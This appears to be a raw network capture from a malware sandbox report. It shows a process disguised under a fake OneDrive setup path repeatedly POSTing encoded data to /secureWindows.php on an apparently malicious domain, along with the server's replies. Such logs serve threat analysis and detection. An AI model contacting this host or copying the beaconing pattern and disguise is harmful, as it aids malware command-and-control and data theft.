                                                        Oct 30, 2024 05:23:38.275430918 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOL4leUlzT5vDr9Qq4RG6%2FgLqeKn3os%2Fqz78%2BQZ98NjS4vib0gkAk0sTHu%2FV0fGJYAXJIy2F2g4kG54s6tnc97xLGHVPdTw6Rw%2BeBaU%2F8VEovVgL5kE2goOyHqrGUPH9lvKdAgM7JH4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a18ea9e52d3f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1373814&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        107192.168.2.450064188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:38.403841972 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:38.763668060 CET1072OUTData Raw: 57 57 5c 56 55 5f 53 56 58 57 50 59 55 58 5b 5d 54 5d 5c 5c 59 54 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\VU_SVXWPYUX[]T]\\YTZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/"Y+8:]3>;A9%&;;<Z 24($- F$,Z*
                                                        Oct 30, 2024 05:23:39.205126047 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:39.218796968 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:39.227893114 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhinxqybpNM%2Fc0GkmSFHZThxejQH25OEsVh9yNjquGehNQGzODIVBJQh0%2F58nDCf49qy97%2Fhao3VwShL2Uxxq7zh3fzcrH0es6Ax2ISd12gg7dUhTGT3%2B04dq3HvIhQscVdD0yDREdw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a19469d62c99-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1408560&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        108192.168.2.450070188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:39.361871958 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:39.714701891 CET1072OUTData Raw: 57 53 59 56 55 5f 56 51 58 57 50 59 55 58 5b 53 54 5c 5c 5f 59 50 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WSYVU_VQXWPYUX[ST\\_YPZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,0:=;23<90\%<Z8)'7:#[2X+%^$&- F$,Z*
                                                        Oct 30, 2024 05:23:39.966705084 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:40.178066015 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzFcgcA89O6cP%2BjLNhBLsVaEhF6kxLlzRnuw9RL9VhPyKtNBmpDr4jwIn6E3Jf1jqHT5humyv8A8WvPp3f2VLPtpmNWT53LBeCH4jQ1KQrwTHudhn%2Bafz4ZBxPnZwiXrk9gemZoOYCU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a19a7eef2c9d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=659380&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        109192.168.2.450076188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:40.310731888 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        110192.168.2.450078188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:40.430283070 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:40.777316093 CET1340OUTData Raw: 57 57 59 52 50 5f 56 5d 58 57 50 59 55 59 5b 59 54 5f 5c 5d 59 51 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WWYRP_V]XWPYUY[YT_\]YQZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;9<^2\3[<.5,%.;-*":8&: <%5[&8^-: F$,Z*!
                                                        Oct 30, 2024 05:23:41.033451080 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:41.247637033 CET930INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JyIaOqsHr2tsQ1%2Bg8eUK4RNWbScZjgbhM4pZnkNJ5Sgfq0PkHhKiYB7Nls2UMqH1eYbK9wlUFYUFrLf5FER9BhTKPpEtHXCT7MWRhiyHmm9%2B4asTYGRR8pSH3gw%2FhlLbh4AXevK2VA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1a11c316c26-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1017&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1411306&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 55 3f 01 34 56 26 0a 2e 5d 29 2f 2d 5a 29 10 2e 5f 33 32 2c 5f 32 12 08 58 3f 2b 02 00 3e 0a 30 12 28 0b 33 00 20 25 20 12 2a 3b 2f 46 0c 10 27 10 24 0b 3b 1e 2b 55 3a 05 2b 38 33 58 23 33 32 11 3e 07 33 56 35 33 20 58 30 08 22 53 2c 2d 26 10 2d 36 35 03 3a 20 28 52 3f 2a 21 57 08 14 22 58 26 05 38 01 31 04 20 16 26 54 36 58 20 3f 3b 5b 22 15 36 1e 3f 3b 28 52 26 0e 16 1d 26 20 23 57 31 3a 30 5c 2b 31 33 56 25 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a
                                                        Data Ascii: 98&U?4V&.])/-Z)._32,_2X?+>0(3 % *;/F'$;+U:+83X#32>3V53 X0"S,-&-65: (R?*!W"X&81 &T6X ?;["6?;(R&& #W1:0\+13V%3"R. V2XS
                                                        Oct 30, 2024 05:23:41.247664928 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        111192.168.2.450082188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:40.555111885 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:40.902273893 CET1076OUTData Raw: 52 50 5c 57 55 55 53 57 58 57 50 59 55 5b 5b 5a 54 59 5c 54 59 5c 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\WUUSWXWPYU[[ZTY\TY\ZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8&_<'[ -% \$-[;:<]7[&_,?%%'89Z/* F$,Z*)
                                                        Oct 30, 2024 05:23:41.160141945 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:41.353987932 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8hGcbX86Mr206SEXyqrMtZFQc%2Bdka4uOSusiAdYwpqfjsy3HvHyAjaPAZ%2Fljzltn5zOwGEQeBgm6%2B5cYagb%2B4kF4YzkEBMeGaZA%2BwIpxVoWzFLRO%2FG%2BvOGRudNNa7lI5hA6qUMmM5eM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1a1ebca6b06-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1404461&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:41.354083061 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        112192.168.2.450088188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:41.488814116 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:41.842777967 CET1076OUTData Raw: 57 50 5c 51 55 5b 56 54 58 57 50 59 55 5b 5b 5b 54 5c 5c 55 59 57 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\QU[VTXWPYU[[[T\\UYWZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/0=;.X$=4.7&;8+ ?[%)/<%'(%_: F$,Z*)
                                                        Oct 30, 2024 05:23:42.084770918 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:42.278170109 CET787INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSmkyd9QH7jRXKkp5YQEfT7L9K0ITyoVRyzPxkExaSMI06stfJjMWxu%2F36XSJU132H%2BJIgmNgyf%2FSAJz9w5DtGJwB3d5IkUxOWM2VFFFItOSXKlkUCSzSF%2BshCXL1Ocy8h461tOD2Og%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1a7ac944760-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1900&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=774745&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        113192.168.2.450094188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:42.403038025 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:42.762444973 CET1076OUTData Raw: 57 57 5c 50 50 5f 53 50 58 57 50 59 55 5b 5b 5e 54 5e 5c 5e 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\PP_SPXWPYU[[^T^\^YVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/#:<;>]' .<Z%0Y/: )+X&9#<6)&8!. F$,Z*)
                                                        Oct 30, 2024 05:23:43.195297956 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:43.214874029 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:43.318422079 CET778INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tef8r2vd18N1bUZwnnORi78IEfvFvJESzlF2MwCnBXh9lEqLTy0S9lxCP9RSfm57nkP20UcSblne3jNKjNI0iebw2qRIQ6BOQm7TTATwmop32AnJqXFYNLGYxyyjlQfRU9d54TIlFFo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1ad6c1b0bbe-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1389&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=962126&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        114192.168.2.450100188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:43.475955009 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:43.829336882 CET1076OUTData Raw: 52 50 59 56 55 54 56 5d 58 57 50 59 55 50 5b 5a 54 53 5c 5b 59 55 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYVUTV]XWPYUP[ZTS\[YUZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,*Y+^.$=-%&= /*< 19/)520-* F$,Z*
                                                        Oct 30, 2024 05:23:44.064430952 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:44.369977951 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuvIDbptRky%2BiV1z7eOEwcz9ncmJ7M31th%2FBW1RNdVCem1ihdpcd6vUghZUfhRbwcBNIbhyH9OO1LHJYvJwkVOVYglwdY%2BFKjRim9ZSEwJXGKpiGgDxhhD49NWY9ZL9FCSGbInKujtQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1b40a5b4696-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1500&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1180114&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        115192.168.2.450106188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:44.497406960 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:44.855449915 CET1072OUTData Raw: 57 52 5c 54 55 5a 56 56 58 57 50 59 55 58 5b 58 54 5c 5c 59 59 50 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\TUZVVXWPYUX[XT\\YYPZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/0]?^&\'>(.C4&_/\<Z */2*?_?"'- F$,Z*-
                                                        Oct 30, 2024 05:23:45.096415997 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:45.299355030 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltLLRvNkx8QPxMf9OIf7M6ft8RBgIq8l2b5ODV7nuQqSjW%2F4iA3yKezeWWCb%2FmxDp0YpfWgDdqRMNwsfiKCi%2FmUlZEm43%2FZ6r8GJ0C3egZiy3ISxTR0c3KNBVaB48vaHb1%2Fa9xaA1kY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1ba7814476c-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1888&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=854277&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        116192.168.2.450112188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:45.432094097 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:45.777308941 CET1076OUTData Raw: 57 57 5c 5c 50 58 56 51 58 57 50 59 55 5a 5b 59 54 5b 5c 5e 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\\PXVQXWPYUZ[YT[\^YSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^/2?8"]'. 9&<1-<[/: Y :%'+)0^&. F$,Z*-
                                                        Oct 30, 2024 05:23:46.036936045 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:46.235941887 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YO0YVF2T3mHNtWVg2N8rqnkJN%2FwQKC%2FskG9Px86n11lcQn1qPsL6%2FGbMsOvGS6WB10DNMLcjHCiMZHTx1ZU2aQcsXCEQ65MYOUHRe9ymPBYapmGprbESa0uZZyOjR70c0Bh%2F2Mc9YTc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1c06f9b2e51-DFW
                                                        alt-svc: h3=":443"; ma=86400
